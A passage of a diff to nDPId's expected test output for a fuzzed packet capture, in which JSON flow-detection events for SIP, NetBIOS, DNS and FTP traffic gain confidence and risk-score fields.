qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":30,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":10240}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590405,"flow_last_seen":1120469590405,"flow_idle_time":180000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":0,"ts_msec":1120469590405,"l3_proto":"ip4","src_ip":"208.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00851{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1120469590405,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":348,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":348,"pkt_l4_len":314,"ts_msec":1120469590405,"pkt":"AODtAW69ADBUADRWCABFAAFOAABAADcRit\/Q8iEjwKgBAhPEE8QBOln2U0lQLzIuMCAxMDAgVHJ5aW5nDQpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDQ2VxOiA2OSBSRUdJU1RFUg0KRnJvbTogPHNpcEZ2b2kxODA2M0DzaXAuY3liZXJjaXR5LmRrPjt0YWc9OGU5NDhiMA0KVG86IDxzaXA6dm9pMTgwNjNAc2lwLmN5YmVyY2l0eS5kaz4NClacYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI7cmVjZWl2ZWQ9ODAuMjMwLjIxOS43MDtycG9ydD01MDYwO2JyYW5jaD16OWhHNGJLbnAxNDk1MDUxNzhTNDM4YzUyOGIxOTIuMTY4LjEuMg0KQ29udGVudC1MZW5ndGg6IDANCg0K"}
-00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590405,"flow_last_seen":1120469590405,"flow_idle_time":180000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":0,"ts_msec":1120469590405,"l3_proto":"ip4","src_ip":"208.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590405,"flow_last_seen":1120469590405,"flow_idle_time":180000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":0,"ts_msec":1120469590405,"l3_proto":"ip4","src_ip":"208.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00906{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1120469590455,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":388,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":388,"pkt_l4_len":354,"ts_msec":1120469590455,"pkt":"AODtAW69ADBUADRBCABFAAF2AABAADcRirfU8iEjwKgBAhPEE8QBYot4U0lQLzIuMCA0MDMgV3JvbmcgcGFzc3dvcmQNCkNhbGwtSUQ6IDU3ODIyMjcyOS00NjY1ZDc3NUA1NzgyIjI3MzItNDY2NWQ3NzINCsNTZXE6IDY5IFJFR0lTVEVSDQpGcm9tOiA8c2lwOnZvaTE4ajYzQHNpcC5jeWJlcmNpdHkuZGs+O3RhZz04ZTk0OGIwDQpUbzogPHNpcDp2b2kxODA2M0BzaXAuY3liZXJjaXR5LmRrPjt022c9MDAtMDQwODUtMTcwMWFmOTgtNTFhNjViMzQwDQpWaWE6IFNJUC8yLjAvVURQIDE5Mi4xNjguMS4yO3JlY2VpdmVkPTgwLjIzMC4yMTkuNzA7cnBvcnQ9NTA2MDvicmFuY2g9ejloRzRiS25wMTQ5NTA1MTc4LTIzOGM1MjhiMTkyLjE2OC4xLjINCkNvbnRlbnQtTGVuZ3RoOiAwDQoNCg=="}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469595096,"flow_last_seen":1120469595096,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1120469595096,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.251","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00717{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1120469595096,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"ts_msec":1120469595096,"pkt":"3\/\/\/\/\/\/\/AODtAW69CABFAADlaaMAAIARTBPAqAECwKgB+wCKAIoA0VtoEQ6E7MCoAQIAigC7AACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469595096,"flow_last_seen":1120469595096,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1120469595096,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.251","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469595096,"flow_last_seen":1120469595096,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1120469595096,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.251","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469611651,"flow_last_seen":1120469611651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1120469611651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1120469611651,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1120469611651,"pkt":"ADBUADRWAODtAW69CABFAAAwaaRAAIAGJpLAqAECk4kVXgqdAb3Y\/7fcAAAAAHACQAA7VwAAAgQFtAEBBAI="}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469611651,"flow_last_seen":1120469611651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1120469611651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -74,16 +74,16 @@
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469620579,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1120469620579,"l3_proto":"ip4","src_ip":"192.168.1.71","dst_ip":"147.137.21.122","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1120469620579,"pkt":"ADBUADRWAODtAW69CABFAAAwaahAAIAGJo7AqAFHk4kVegqeAIstxX7gAAAAAHACQAAgvwAAAgQFtAEBBAI="}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1120469620579,"pkt":"ADBUADRWAODtAW69CABFAAAwaalAAIAGJo3AqAECk4kVXgqdAb3Y\/7fcAAAAAHACQAA7VwAAAgQFtAEBBAI="}
-00659{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":41,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1120469540839,"flow_last_seen":1120469590576,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469632829,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00685{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":41,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1120469540839,"flow_last_seen":1120469590576,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469632829,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00585{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":41,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469542336,"flow_last_seen":1120469542336,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469632829,"l3_proto":"ip4","src_ip":"217.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469632829,"flow_last_seen":1120469632829,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1120469632829,"l3_proto":"ip4","src_ip":"192.114.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1120469632829,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1120469632829,"pkt":"ADBUADRWAODtAW69CABFAAA9aaoAAIARTbLAcgECwKgBAQqfADUAKUpe7dQBAAABgAAAUgAAA2Z0cAdlY2l0ZexlA2NvbQAAAQAB"}
-00744{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469632829,"flow_last_seen":1120469632829,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1120469632829,"l3_proto":"ip4","src_ip":"192.114.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ftp.ecite?e.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469632829,"flow_last_seen":1120469632829,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1120469632829,"l3_proto":"ip4","src_ip":"192.114.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ftp.ecite?e.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469633828,"flow_last_seen":1120469633828,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1120469633828,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1120469633828,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1120469633828,"pkt":"ADBUADRWEODtAW69CABFAAA9aasAAIARTbHAqAECwKgBAQqfADUAKUpe7dQBAAABAAAAAAAAA2Z0cAdlY2l0ZWxlA2NvbQAAAQAB"}
-00744{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469633828,"flow_last_seen":1120469633828,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1120469633828,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ftp.ecitele.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469633828,"flow_last_seen":1120469633828,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1120469633828,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ftp.ecitele.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1120469634840,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1120469634840,"pkt":"AODtAW69ADBUADRWCABFAACaAABAAEARtv\/AqAEBwKgBAgA1Cp8Ahtfh7dSBgAABAAKzAgABA2Z0cLxlY2l0ZexlA2NvbQAAAQABwAwABQABAAAC9QAGA2Ruc8AQwC0AAQABAAAAIQAEk+oB\/cAQAAIAAQAAA0MAEQJucwViYXJhawNuZXQCaWwAwBAAAgABAAADQwACwC3ATwABAGoAAAARAATUljCp"}
-00773{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":43,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469633828,"flow_last_seen":1120469634840,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"ts_msec":1120469634840,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"147.234.1.253"}}
+00880{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":43,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469633828,"flow_last_seen":1120469634840,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"ts_msec":1120469634840,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"147.234.1.253"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469634878,"flow_last_seen":1120469634878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1120469634878,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1120469634878,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1120469634878,"pkt":"ADBUAHNWAODtAW69CABFAAAwaaxAAIAGOYrAqAECk+oB\/QqgABWvnVkPAABkAHACQABuKwAAAgQFtAEBBAI="}
 00373{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":45,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":62,"pkt_l4_len":0,"ts_msec":1120469634896,"pkt":"AODtAW69ADBUADRWCABVAAAweP9AADkGcTeT6gH9wKgBAgAVCqDlH5UEr53DEHASYzbQ8AAAAQEEAgIEBYM="}
@@ -143,107 +143,107 @@
 00421{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":97,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"ts_msec":1120469638585,"pkt":"\/\/\/\/\/7\/\/AODtAW69CABFAABeacMAAIARTIrAqAECwKgB\/wCJAIkAOluqhPEBEAABAAAAAAB0IEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="}
 00198{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":97,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58}
 00585{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469552651,"flow_last_seen":1120469552651,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.37.115.0","src_port":2712,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00661{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469572844,"flow_last_seen":1120469572844,"flow_idle_time":180000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00660{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469572981,"flow_last_seen":1120469590455,"flow_idle_time":180000,"flow_min_l4_payload_len":346,"flow_max_l4_payload_len":486,"flow_tot_l4_payload_len":832,"flow_avg_l4_payload_len":416,"midstream":0,"ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469572844,"flow_last_seen":1120469572844,"flow_idle_time":180000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00686{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469572981,"flow_last_seen":1120469590455,"flow_idle_time":180000,"flow_min_l4_payload_len":346,"flow_max_l4_payload_len":486,"flow_tot_l4_payload_len":832,"flow_avg_l4_payload_len":416,"midstream":0,"ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469551656,"flow_last_seen":1120469551656,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2712,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
